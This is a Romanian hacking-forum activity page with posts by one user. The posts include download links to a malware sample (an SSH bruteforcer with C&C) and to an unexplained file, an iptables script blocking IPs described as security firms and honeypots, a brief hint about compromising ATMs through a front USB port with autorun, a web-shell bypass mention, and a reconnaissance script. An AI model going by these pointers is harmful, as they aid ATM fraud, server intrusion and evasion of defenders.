Jump to content

MadAgent

Active Members
 View Profile  See their activity

  • Posts

    97

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by MadAgent

  1. MadAgent
    Daca vrei sa dai doar pe cablu, cred ca iti poti face cu orice router care suporta DD-WRT; daca vrei sa dai si pe wireless si iti place sa modezi, te poti apuca sa faci ceva cu Raspberry; iar o solutie relativ ieftina out of the box ar fi pineapple.
  2. MadAgent
    Sper sa nu fi postat in rubrica gresita si sa va fie de ajutor(celor care vreti sa faceti reverse). E bruteforcer(SSH) din cate am putut sa-mi dau seama, se conecteaza la un C&C(cred ca nu e IRCD). Din pacate la momentul testarii, conectarea la C&C da timeout. Acelasi binar pentru mai multe procesoare - x32, x64,arm, mips,..... Link: https://www.sendspace.com/file/54jyoj
  3. MadAgent
    De-a lungul timpului, am gasit mai multe IP-uri pe care eu personal le blochez de obicei pe anumite servere, unele sunt de la firme de securitate, altele sunt de la institutii guvernamentale, iar celelalte honeypot-uri de la diverse entitati fizice sau juridice fara renume. Unele dintre IP-uri sunt luate de pe "decedatul" ryan cu mult timp in urma. #!/bin/sh $IPTABLES_CMD="/sbin/iptables" $IPTABLES_CMD -A INPUT -m iprange --src-range 123.252.235.208-123.252.235.215 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 149.5.0.0-149.5.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 149.9.0.0-149.9.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 195.228.45.0-195.228.45.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 196.20.64.0-196.20.127.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 208.123.40.0-208.123.41.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 208.123.40.0-208.123.41.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 208.80.192.0-208.80.199.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 213.30.189.64-213.30.189.71 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 24.6.0.0-24.6.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 67.112.0.0-67.127.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 67.112.0.0-67.127.255.25 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 68.62.208.0-68.62.223.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 69.164.192.0-69.164.223.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 74.92.0.0-74.95.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 76.96.0.0-76.127.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 81.27.0.0-81.27.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 84.14.214.192-84.14.214.223 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 85.48.0.0-85.55.255.255 -j DROP $IPTABLES_CMD -A INPUT -m iprange --src-range 85.84.0.0-85.87.255.255 -j DROP $IPTABLES_CMD -A INPUT -p tcp -i eth1 -s 10.0.0.125 --dport 25 -j REJECT $IPTABLES_CMD -A INPUT -p tcp -s 204.181.64.8 -j DROP $IPTABLES_CMD -A INPUT -p tcp -s 38.105.71.114 -j DROP $IPTABLES_CMD -A INPUT -p tcp -s 38.105.71.72 -j DROP $IPTABLES_CMD -A INPUT -p tcp -s 63.240.91.179 -j DROP $IPTABLES_CMD -A INPUT -p tcp -s 69.164.194.188 -j DROP $IPTABLES_CMD -A INPUT -p tcp -s 69.28.58.11 -j DROP $IPTABLES_CMD -A INPUT -p tcp -s 69.28.58.3 -j DROP $IPTABLES_CMD -A INPUT -s 109.129.189.25 -j DROP $IPTABLES_CMD -A INPUT -s 110.212.10.83 -j DROP $IPTABLES_CMD -A INPUT -s 111.85.145.67 -j DROP $IPTABLES_CMD -A INPUT -s 112.237.14.255 -j DROP $IPTABLES_CMD -A INPUT -s 113.106.106.131 -j DROP $IPTABLES_CMD -A INPUT -s 113.224.152.145 -j DROP $IPTABLES_CMD -A INPUT -s 113.225.187.144 -j DROP $IPTABLES_CMD -A INPUT -s 113.240.31.69 -j DROP $IPTABLES_CMD -A INPUT -s 113.70.91.171 -j DROP $IPTABLES_CMD -A INPUT -s 113.89.160.108 -j DROP $IPTABLES_CMD -A INPUT -s 114.221.173.245 -j DROP $IPTABLES_CMD -A INPUT -s 114.221.174.20 -j DROP $IPTABLES_CMD -A INPUT -s 114.246.65.21 -j DROP $IPTABLES_CMD -A INPUT -s 114.246.94.130 -j DROP $IPTABLES_CMD -A INPUT -s 114.248.93.229 -j DROP $IPTABLES_CMD -A INPUT -s 115.213.74.17 -j DROP $IPTABLES_CMD -A INPUT -s 115.60.8.23 -j DROP $IPTABLES_CMD -A INPUT -s 116.236.201.122 -j DROP $IPTABLES_CMD -A INPUT -s 116.238.231.239 -j DROP $IPTABLES_CMD -A INPUT -s 117.136.9.173 -j DROP $IPTABLES_CMD -A INPUT -s 117.22.203.191 -j DROP $IPTABLES_CMD -A INPUT -s 118.100.233.137 -j DROP $IPTABLES_CMD -A INPUT -s 118.169.34.98 -j DROP $IPTABLES_CMD -A INPUT -s 118.213.83.50 -j DROP $IPTABLES_CMD -A INPUT -s 118.32.89.208 -j DROP $IPTABLES_CMD -A INPUT -s 118.81.3.97 -j DROP $IPTABLES_CMD -A INPUT -s 119.108.179.10 -j DROP $IPTABLES_CMD -A INPUT -s 119.108.184.61 -j DROP $IPTABLES_CMD -A INPUT -s 119.108.185.49 -j DROP $IPTABLES_CMD -A INPUT -s 119.118.224.11 -j DROP $IPTABLES_CMD -A INPUT -s 119.118.227.104 -j DROP $IPTABLES_CMD -A INPUT -s 119.118.234.253 -j DROP $IPTABLES_CMD -A INPUT -s 119.118.235.129 -j DROP $IPTABLES_CMD -A INPUT -s 119.118.236.5 -j DROP $IPTABLES_CMD -A INPUT -s 119.119.232.17 -j DROP $IPTABLES_CMD -A INPUT -s 119.192.191.117 -j DROP $IPTABLES_CMD -A INPUT -s 120.0.196.204 -j DROP $IPTABLES_CMD -A INPUT -s 120.69.249.188 -j DROP $IPTABLES_CMD -A INPUT -s 120.89.55.3 -j DROP $IPTABLES_CMD -A INPUT -s 121.29.121.203 -j DROP $IPTABLES_CMD -A INPUT -s 122.169.71.53 -j DROP $IPTABLES_CMD -A INPUT -s 122.169.76.19 -j DROP $IPTABLES_CMD -A INPUT -s 122.173.11.26 -j DROP $IPTABLES_CMD -A INPUT -s 122.224.129.146 -j DROP $IPTABLES_CMD -A INPUT -s 123.101.50.131 -j DROP $IPTABLES_CMD -A INPUT -s 123.119.238.120 -j DROP $IPTABLES_CMD -A INPUT -s 123.134.170.169 -j DROP $IPTABLES_CMD -A INPUT -s 123.134.175.46 -j DROP $IPTABLES_CMD -A INPUT -s 123.161.193.186 -j DROP $IPTABLES_CMD -A INPUT -s 123.175.177.156 -j DROP $IPTABLES_CMD -A INPUT -s 123.188.187.249 -j DROP $IPTABLES_CMD -A INPUT -s 123.237.8.146 -j DROP $IPTABLES_CMD -A INPUT -s 123.247.158.181 -j DROP $IPTABLES_CMD -A INPUT -s 123.252.235.210 -j DROP $IPTABLES_CMD -A INPUT -s 123.67.48.107 -j DROP $IPTABLES_CMD -A INPUT -s 124.107.147.138 -j DROP $IPTABLES_CMD -A INPUT -s 124.130.0.7 -j DROP $IPTABLES_CMD -A INPUT -s 124.134.102.51 -j DROP $IPTABLES_CMD -A INPUT -s 124.89.51.12 -j DROP $IPTABLES_CMD -A INPUT -s 124.94.211.119 -j DROP $IPTABLES_CMD -A INPUT -s 125.125.190.176 -j DROP $IPTABLES_CMD -A INPUT -s 125.224.199.18 -j DROP $IPTABLES_CMD -A INPUT -s 125.93.76.242 -j DROP $IPTABLES_CMD -A INPUT -s 128.151.238.70 -j DROP $IPTABLES_CMD -A INPUT -s 128.241.111.20 -j DROP $IPTABLES_CMD -A INPUT -s 143.215.130.53 -j DROP $IPTABLES_CMD -A INPUT -s 149.5.168.2 -j DROP $IPTABLES_CMD -A INPUT -s 149.9.0.58 -j DROP $IPTABLES_CMD -A INPUT -s 150.70.172.103 -j DROP $IPTABLES_CMD -A INPUT -s 150.70.172.206 -j DROP $IPTABLES_CMD -A INPUT -s 166.205.15.248 -j DROP $IPTABLES_CMD -A INPUT -s 173.227.230.236 -j DROP $IPTABLES_CMD -A INPUT -s 176.28.54.34 -j DROP $IPTABLES_CMD -A INPUT -s 178.125.148.201 -j DROP $IPTABLES_CMD -A INPUT -s 178.255.248.155 -j DROP $IPTABLES_CMD -A INPUT -s 180.110.188.186 -j DROP $IPTABLES_CMD -A INPUT -s 183.191.217.78 -j DROP $IPTABLES_CMD -A INPUT -s 183.91.2.8 -j DROP $IPTABLES_CMD -A INPUT -s 186.42.141.207 -j DROP $IPTABLES_CMD -A INPUT -s 186.46.17.199 -j DROP $IPTABLES_CMD -A INPUT -s 188.165.140.240 -j DROP $IPTABLES_CMD -A INPUT -s 188.98.64.4 -j DROP $IPTABLES_CMD -A INPUT -s 189.67.191.43 -j DROP $IPTABLES_CMD -A INPUT -s 193.173.137.253 -j DROP $IPTABLES_CMD -A INPUT -s 193.200.150.125 -j DROP $IPTABLES_CMD -A INPUT -s 195.134.168.251 -j DROP $IPTABLES_CMD -A INPUT -s 195.177.247.202 -j DROP $IPTABLES_CMD -A INPUT -s 195.214.79.22 -j DROP $IPTABLES_CMD -A INPUT -s 195.228.45.78 -j DROP $IPTABLES_CMD -A INPUT -s 195.243.67.18 -j DROP $IPTABLES_CMD -A INPUT -s 196.20.73.60 -j DROP $IPTABLES_CMD -A INPUT -s 198.172.203.249 -j DROP $IPTABLES_CMD -A INPUT -s 200.215.222.234 -j DROP $IPTABLES_CMD -A INPUT -s 201.53.194.175 -j DROP $IPTABLES_CMD -A INPUT -s 201.82.88.189 -j DROP $IPTABLES_CMD -A INPUT -s 202.144.154.34 -j DROP $IPTABLES_CMD -A INPUT -s 203.210.153.11 -j DROP $IPTABLES_CMD -A INPUT -s 204.118.31.201 -j DROP $IPTABLES_CMD -A INPUT -s 204.181.64.8 -j DROP $IPTABLES_CMD -A INPUT -s 204.95.105.214 -j DROP $IPTABLES_CMD -A INPUT -s 205.212.79.43 -j DROP $IPTABLES_CMD -A INPUT -s 207.189.121.46 -j DROP $IPTABLES_CMD -A INPUT -s 207.6.44.37 -j DROP $IPTABLES_CMD -A INPUT -s 208.80.192.56 -j DROP $IPTABLES_CMD -A INPUT -s 208.80.194.28 -j DROP $IPTABLES_CMD -A INPUT -s 208.80.194.33 -j DROP $IPTABLES_CMD -A INPUT -s 208.80.194.35 -j DROP $IPTABLES_CMD -A INPUT -s 209.17.131.125 -j DROP $IPTABLES_CMD -A INPUT -s 211.236.246.220 -j DROP $IPTABLES_CMD -A INPUT -s 212.227.136.64 -j DROP $IPTABLES_CMD -A INPUT -s 212.56.95.253 -j DROP $IPTABLES_CMD -A INPUT -s 212.92.4.44 -j DROP $IPTABLES_CMD -A INPUT -s 213.119.53.117 -j DROP $IPTABLES_CMD -A INPUT -s 213.30.189.66 -j DROP $IPTABLES_CMD -A INPUT -s 213.85.115.198 -j DROP $IPTABLES_CMD -A INPUT -s 213.88.151.72 -j DROP $IPTABLES_CMD -A INPUT -s 216.155.158.171 -j DROP $IPTABLES_CMD -A INPUT -s 216.157.208.146 -j DROP $IPTABLES_CMD -A INPUT -s 216.18.100.157 -j DROP $IPTABLES_CMD -A INPUT -s 217.75.75.99 -j DROP $IPTABLES_CMD -A INPUT -s 218.202.219.8 -j DROP $IPTABLES_CMD -A INPUT -s 218.22.173.88 -j DROP $IPTABLES_CMD -A INPUT -s 218.4.211.134 -j DROP $IPTABLES_CMD -A INPUT -s 219.139.148.108 -j DROP $IPTABLES_CMD -A INPUT -s 219.151.9.139 -j DROP $IPTABLES_CMD -A INPUT -s 220.152.129.221 -j DROP $IPTABLES_CMD -A INPUT -s 220.178.18.166 -j DROP $IPTABLES_CMD -A INPUT -s 220.225.70.109 -j DROP $IPTABLES_CMD -A INPUT -s 221.11.46.91 -j DROP $IPTABLES_CMD -A INPUT -s 221.137.218.249 -j DROP $IPTABLES_CMD -A INPUT -s 222.183.15.230 -j DROP $IPTABLES_CMD -A INPUT -s 222.240.216.19 -j DROP $IPTABLES_CMD -A INPUT -s 24.6.61.231 -j DROP $IPTABLES_CMD -A INPUT -s 27.188.224.187 -j DROP $IPTABLES_CMD -A INPUT -s 38.105.71.114 -j DROP $IPTABLES_CMD -A INPUT -s 38.105.71.72 -j DROP $IPTABLES_CMD -A INPUT -s 38.229.0.75 -j DROP $IPTABLES_CMD -A INPUT -s 46.5.31.193 -j DROP $IPTABLES_CMD -A INPUT -s 58.216.206.62 -j DROP $IPTABLES_CMD -A INPUT -s 58.53.131.186 -j DROP $IPTABLES_CMD -A INPUT -s 59.92.68.2 -j DROP $IPTABLES_CMD -A INPUT -s 60.213.136.122 -j DROP $IPTABLES_CMD -A INPUT -s 60.215.157.32 -j DROP $IPTABLES_CMD -A INPUT -s 60.52.96.99 -j DROP $IPTABLES_CMD -A INPUT -s 61.163.230.239 -j DROP $IPTABLES_CMD -A INPUT -s 61.180.36.50 -j DROP $IPTABLES_CMD -A INPUT -s 62.10.117.169 -j DROP $IPTABLES_CMD -A INPUT -s 62.194.131.137 -j DROP $IPTABLES_CMD -A INPUT -s 63.240.91.179 -j DROP $IPTABLES_CMD -A INPUT -s 64.124.203.72 -j DROP $IPTABLES_CMD -A INPUT -s 64.124.203.77 -j DROP $IPTABLES_CMD -A INPUT -s 64.212.34.30 -j DROP $IPTABLES_CMD -A INPUT -s 64.237.49.72 -j DROP $IPTABLES_CMD -A INPUT -s 67.121.127.36 -j DROP $IPTABLES_CMD -A INPUT -s 67.124.37.250 -j DROP $IPTABLES_CMD -A INPUT -s 67.124.38.158 -j DROP $IPTABLES_CMD -A INPUT -s 67.79.193.250 -j DROP $IPTABLES_CMD -A INPUT -s 68.62.212.103 -j DROP $IPTABLES_CMD -A INPUT -s 68.71.52.49 -j DROP $IPTABLES_CMD -A INPUT -s 69.119.109.216 -j DROP $IPTABLES_CMD -A INPUT -s 69.163.129.35 -j DROP $IPTABLES_CMD -A INPUT -s 69.164.194.188 -j DROP $IPTABLES_CMD -A INPUT -s 69.28.58.11 -j DROP $IPTABLES_CMD -A INPUT -s 69.28.58.3 -j DROP $IPTABLES_CMD -A INPUT -s 69.33.155.123 -j DROP $IPTABLES_CMD -A INPUT -s 71.56.58.47 -j DROP $IPTABLES_CMD -A INPUT -s 72.1.196.184 -j DROP $IPTABLES_CMD -A INPUT -s 74.211.165.68 -j DROP $IPTABLES_CMD -A INPUT -s 74.45.163.47 -j DROP $IPTABLES_CMD -A INPUT -s 74.50.3.205 -j DROP $IPTABLES_CMD -A INPUT -s 76.119.101.56 -j DROP $IPTABLES_CMD -A INPUT -s 77.121.0.3 -j DROP $IPTABLES_CMD -A INPUT -s 80.108.65.8 -j DROP $IPTABLES_CMD -A INPUT -s 80.201.238.34 -j DROP $IPTABLES_CMD -A INPUT -s 81.240.20.154 -j DROP $IPTABLES_CMD -A INPUT -s 8.17.84.53 -j DROP $IPTABLES_CMD -A INPUT -s 81.93.167.102 -j DROP $IPTABLES_CMD -A INPUT -s 82.169.28.225 -j DROP $IPTABLES_CMD -A INPUT -s 82.75.58.63 -j DROP $IPTABLES_CMD -A INPUT -s 84.127.116.154 -j DROP $IPTABLES_CMD -A INPUT -s 84.14.214.213 -j DROP $IPTABLES_CMD -A INPUT -s 84.158.131.139 -j DROP $IPTABLES_CMD -A INPUT -s 84.158.132.168 -j DROP $IPTABLES_CMD -A INPUT -s 84.158.132.191 -j DROP $IPTABLES_CMD -A INPUT -s 84.197.30.65 -j DROP $IPTABLES_CMD -A INPUT -s 84.222.66.12 -j DROP $IPTABLES_CMD -A INPUT -s 85.186.178.141 -j DROP $IPTABLES_CMD -A INPUT -s 85.54.230.6 -j DROP $IPTABLES_CMD -A INPUT -s 85.85.187.243 -j DROP $IPTABLES_CMD -A INPUT -s 86.55.176.111 -j DROP $IPTABLES_CMD -A INPUT -s 87.179.30.194 -j DROP $IPTABLES_CMD -A INPUT -s 89.217.104.62 -j DROP $IPTABLES_CMD -A INPUT -s 91.176.232.84 -j DROP $IPTABLES_CMD -A INPUT -s 91.182.132.233 -j DROP $IPTABLES_CMD -A INPUT -s 91.182.35.169 -j DROP $IPTABLES_CMD -A INPUT -s 91.20.16.4 -j DROP $IPTABLES_CMD -A INPUT -s 91.202.72.226 -j DROP $IPTABLES_CMD -A INPUT -s 91.212.136.222 -j DROP $IPTABLES_CMD -A INPUT -s 91.52.196.131 -j DROP $IPTABLES_CMD -A INPUT -s 92.113.246.92 -j DROP $IPTABLES_CMD -A INPUT -s 92.140.43.101 -j DROP $IPTABLES_CMD -A INPUT -s 92.9.231.169 -j DROP $IPTABLES_CMD -A INPUT -s 93.122.64.100 -j DROP $IPTABLES_CMD -A INPUT -s 94.227.11.160 -j DROP $IPTABLES_CMD -A INPUT -s 94.67.209.184 -j DROP $IPTABLES_CMD -A INPUT -s 95.133.42.146 -j DROP $IPTABLES_CMD -A INPUT -s 96.50.0.167 -j DROP $IPTABLES_CMD -A INPUT -s 96.50.0.168 -j DROP $IPTABLES_CMD -A INPUT -s 99.30.82.190 -j DROP $IPTABLES_CMD -A INPUT -s 99.50.91.143 -j DROP $IPTABLES_CMD -I INPUT -s 129.78.233.211 -j DROP $IPTABLES_CMD -I INPUT -s 129.78.233.212 -j DROP $IPTABLES_CMD -I INPUT -s 140.120.21.19 -j DROP $IPTABLES_CMD -I INPUT -s 150.70.172.101 -j DROP $IPTABLES_CMD -I INPUT -s 150.70.173.39 -j DROP $IPTABLES_CMD -I INPUT -s 150.70.173.57 -j DROP $IPTABLES_CMD -I INPUT -s 150.70.75.167 -j DROP $IPTABLES_CMD -I INPUT -s 150.70.97.122 -j DROP $IPTABLES_CMD -I INPUT -s 178.217.186.39 -j DROP $IPTABLES_CMD -I INPUT -s 195.159.140.196 -j DROP $IPTABLES_CMD -I INPUT -s 213.167.45.195 -j DROP $IPTABLES_CMD -I INPUT -s 213.174.144.38 -j DROP $IPTABLES_CMD -I INPUT -s 218.45.10.35 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.101 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.102 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.104 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.106 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.107 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.108 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.111 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.113 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.125 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.129 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.131 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.144 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.145 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.147 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.149 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.90 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.91 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.92 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.94 -j DROP $IPTABLES_CMD -I INPUT -s 219.84.227.96 -j DROP $IPTABLES_CMD -I INPUT -s 46.28.88.12 -j DROP $IPTABLES_CMD -I INPUT -s 5.35.208.53 -j DROP $IPTABLES_CMD -I INPUT -s 62.118.254.11 -j DROP $IPTABLES_CMD -I INPUT -s 62.149.26.52 -j DROP $IPTABLES_CMD -I INPUT -s 62.149.26.54 -j DROP $IPTABLES_CMD -I INPUT -s 68.64.169.107 -j DROP $IPTABLES_CMD -I INPUT -s 91.192.138.120 -j DROP Daca ati mai gasit si voi si vreti sa impartasiti, postati si le adaug in lista principala. P.S. Daca ar fi important sa fie in alta sectiune va rog mutati.
  4. MadAgent
    Misto, dar tot nu te identifica unic pe tine, ci te incadreaza intr-un tipar... Daca as folosi browser-ul respectiv si pentru lucruri care tin de viata de zi cu zi, sau daca as iesi direct cu adresa de acasa, sau m-as loga pe conturi personale, GLUGA ar putea sa ma gaseasca dupa user behaviour. Oricum daca faci magarii si vrea sa te gaseasca downloadeaza ceva cu un 0day la tine si-ti activeaza camera, iti ia seriile de la componente si "tãti shele"(daca au bagat in New York Times, cred ca ar putea sa bage si-n alte site-uri).
  5. MadAgent
    Compromisuri... poate se gandea ca pentru o depanare, nu va avea loc in spatele ATM-ului(ex ATM din magazine - sunt frecvente in afara tarii) cu un laptop sau alte echipamente(sau pentru a nu desface toata magaoaia, sunt ATM-uri care se deschid prin fata - http://www.extremetech.com/wp-content/uploads/2013/12/Two_Loomis_Employees_Refilling_an_ATM_at_the_Downtown_Seattle_REI.jpg).
  6. MadAgent
    Identificarea se face pe IP, UserAgent: $etag = substr(sha1($secret . sha1($_SERVER["REMOTE_ADDR"]) . sha1($_SERVER["HTTP_USER_AGENT"])), 0, 18); Momentan, daca schimbi IP + stergi cookies + stergi cache esti protejat(cel putin de metodele publice), bineinteles ca pot exista apllet-uri sau alte nebunii semnate anumite authority-uri prin care se pot vedea seriile de hardware, dar asta e viata. Off-topic: Daca vrei sa fi invizibil, lasi tehnologia acasa si intri intr-un buncar sub pamant la 50-100m adancime(nu mai merge nici daca esti in padure, te gasi dupa ritmul batailor inimii).
  7. MadAgent
    Din pacate, unele ATM-uri au port usb in partea din fata(unele sub keypad). Poti da jos keypad-ul si sa bagi stick cu autorun, sau daca e disabled autorunul dar are cod de admin default, poti gasi o modalitate sa rulezi... Off-topic: Tehnologii de doi lei sunt adoptate pentru plati doar din cauza ca lumea a fost invatata(voit de catre "sistem" sau au fost luati de valul tehnologizarii) sa le foloseasca si are prea putine informatii pentru a-si da seama la ce se expun.
  8. MadAgent
    Daca are webpage-ul in alt dir sau daca are altcineva drepturi pe directory, nu se poate scrie in fisier. Daca are iptables in picioare, nu se deschide port. Rar se blocheaza ping din iptables, si de obicei se blocheaza incoming, nu outgoing, deci e cel mai sigur asa
  9. MadAgent
    AdyRo, dupa cum ii spune si numele, trebuie sa pui ip in loc de Google. Foloseste varianta postata...
  10. MadAgent
    Pai, cam asta e, dar din teste am vazut ca pe anumite geo locatii ale serverului pune tot h3, restul de modificari sunt facute dupa nevoile mele...
  11. MadAgent
    #!/bin/bash #Based on bing-ip2hosts v4 by Andrew Horton aka urbanadventurer, MorningStar Security #Modified by MadAgent on August 2014, released for RST Forums #Saves results to 'hosts' file VERSION=0.5 TMPDIR=./tmp ANIMATION=0 OUTPUTIP=1 HTTPPREFIX=0 IP= PREFIX= DEBUG=0 rm -rf hosts > /dev/null 2>&1 if [ -z "$1" ] || [ "$1" == "-h" ] || [ "$1" == "--help" ]; then echo -e " OPTIONS are: -n\t\tTurn off the progress indicator animation -t <DIR>\tUse this directory instead of /tmp. The directory must exist. -i\t\tOptional CSV output. Outputs the IP and hostname on each line, separated by a comma. -p\t\tOptional http:// prefix output. Useful for right-clicking in the shell. " exit 1 fi while getopts "nipt:" optionName; do case "$optionName" in n) ANIMATION=0;; t) TMPDIR="$OPTARG";; i) OUTPUTIP=1;; p) HTTPPREFIX=1;; [?]) echo "Error"; exit 1;; esac done shift $(($OPTIND -1)) if [ -z "$1" ]; then echo "need an IP or hostname" exit 1 fi animation="/-\|" page=0 last_page_check= how_many=1 uniq_hosts=0 single_page= # if the parameter looks like an IP go ahead, otherwise resolve it if [ `echo "$1" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then IP="$1" else # IP=`resolveip -s "$1"` IP=`nslookup "$1" |egrep "^Address: \w+\.\w+\.\w+\.\w+$"|tail -1|awk '{ print $2 }'` # dig -t a treshna.com +short if [ "$IP" == "" ]; then echo "Error: cannot resolve $1 to an IP" exit fi fi all_hosts=`mktemp -p $TMPDIR -t bing-ip2hosts.tmp.XXXXXX` while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do if [ $ANIMATION == 1 ]; then echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b" echo -en "[ $IP | Scraping $how_many | Found $uniq_hosts | ${animation: $(( $page % 4 )) :1} ]" fi url="http://www.bing.com/search?q=ip%3A$IP&go=&qs=n&first=${page}0&FORM=PERE" out=`mktemp -p "$TMPDIR" -t bing-ip2hosts.tmp.XXXXXX` wget -q -O "$out" "$url" last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' $out` if [[ "$last_page_check" -eq "" ]]; then last_page_check=`egrep -o '<span class="sb_count">[0-9]+-([0-9]+) of (\1)' $out` fi if [ "$DEBUG" -eq 1 ]; then echo "Last Page Check: $last_page_check" fi # if no results are found, how_many is empty and the loop will exit how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' $out|cut -d '>' -f 2|cut -d ' ' -f 1-3` if [[ "$how_many" -eq "" ]]; then how_many=`egrep -o '<span class="sb_count">[^<]+' $out|cut -d '>' -f 2|cut -d ' ' -f 1-3` fi # check for a single page of results single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' $out` if [[ "$single_page" -eq "" ]]; then single_page=`egrep -o '<span class="sb_count">[0-9] ' $out` fi if [ $DEBUG -eq 1 ];then echo "Single Page: $single_page" fi # no captcha support or detection # pages will contain "Typing the characters in the picture above helps us ensure that a person, not a program, is performing a search" vhosts=`cat "$out"| egrep -o "<h3><a href=\"[^\"]+" $out |cut -d '"' -f 2` if [[ "$vhosts" -eq "" ]]; then vhosts=`cat "$out"| egrep -o "<h2><a href=\"[^\"]+" $out |cut -d '"' -f 2` fi echo -e "$vhosts" >> "$all_hosts" uniq_hosts=`cat "$all_hosts" | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sort | uniq | wc -l` if [ $DEBUG -eq 0 ]; then rm -f "$out" fi let page=$page+1 if [ $DEBUG -eq 1 ]; then echo "Page: $page" fi done if [ $ANIMATION == 1 ]; then echo fi __NSLOOKUP="$(which nslookup)" __HOST="$(which host)" if [[ "$__NSLOOKUP" != "" ]]; then echo -e "$($__NSLOOKUP $IP | grep name | awk '{ print $NF }' | sed 's/\.$//' | sed 's/ //g')" >> "$all_hosts" fi if [[ "$__HOST" != "" ]]; then echo -e "$($__HOST $IP | grep -v 'not found' | grep name | awk '{ print $NF }' | sed 's/\.$//' | sed 's/ //g')" >> "$all_hosts" fi echo -e "$(host $IP | grep -v 'not found' | awk '{ print $NF }' | sed 's/\.$//' | sed 's/ //g')" >> "$all_hosts" uniq_hosts=`cat "$all_hosts" | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sort | uniq` if [ $DEBUG -eq 0 ]; then rm -f "$all_hosts" fi if [ $OUTPUTIP == 1 ]; then PREFIX="$IP," fi if [ $HTTPPREFIX == 1 ]; then PREFIX="$PREFIX""http://" fi for h in `echo "$uniq_hosts"` do echo "$PREFIX$h" >> hosts done
  12. MadAgent
    Login bypass Exploit -> poti executa comenzi trimitand parametrii prin post sau GET Examplu: SyRiAn Electronic Army Shell :: SEA Shell Bypass: SyRiAn Electronic Army Shell :: SEA Shell Mai vezi si panoul de comanda, deci nu te mai complici sa dai ca Dorel prin GET si POST...
  13. MadAgent
    Cred ca este o variatie a https://towelroot.com
  14. MadAgent
    Am cam stat sa ma gandesc daca sa postez sau nu. Daca tot l-am gasit l-am urcat aici: https://www.sendspace.com/file/hs4v1o Nu stiu daca e ceva de capul lui, nu am prea avut timp de el azi. Daca are cineva timp/chef sa-l testeze, sa lase si un feedback.
  15. MadAgent
    Pentru ca invatamantul din Romania e praf, pentru ca scoala de la noi nu te invata nimic, pentru ca intr-o tara cat de cat civilizata ar trebui sa se puna accent pe ceea ce sti, nu pe ce curpapir pui pe masa, pentru ca astazi pe chat se vorbea de shpaga pentru BAC, pentru ca tocmai am vazut asta si m-a marcat in ce lume traim, pentru ca pot, pentru ca postez rar pe forum, pentru a va mai scoate din monotonie.
  16. MadAgent
    Se pare ca universitatiile din Romania au inceput sa urmeaze modelul celor din tariile civilizate. Bazandu-se pe ideea ca nu exista publicitate negativa, ASE-ul isi face publicitate moca in mai multe tabloide romanesti. Prodecanul Facult??ii de Finan?e-B?nci din ASE, re?inut pentru luare de mit? de la studen?i - Mediafax
  17. MadAgent
    Cel putin la cPanel-e e ok omu'.
  18. MadAgent
    Daca lucreaza pe acelasi principiu cu [APP][ROOT][WiFi] Reaver-GUI for Android - xda-developers e posibil sa va trebuiasca cyanogenmod. Doar anumite telefoane sunt suportate.
  19. MadAgent
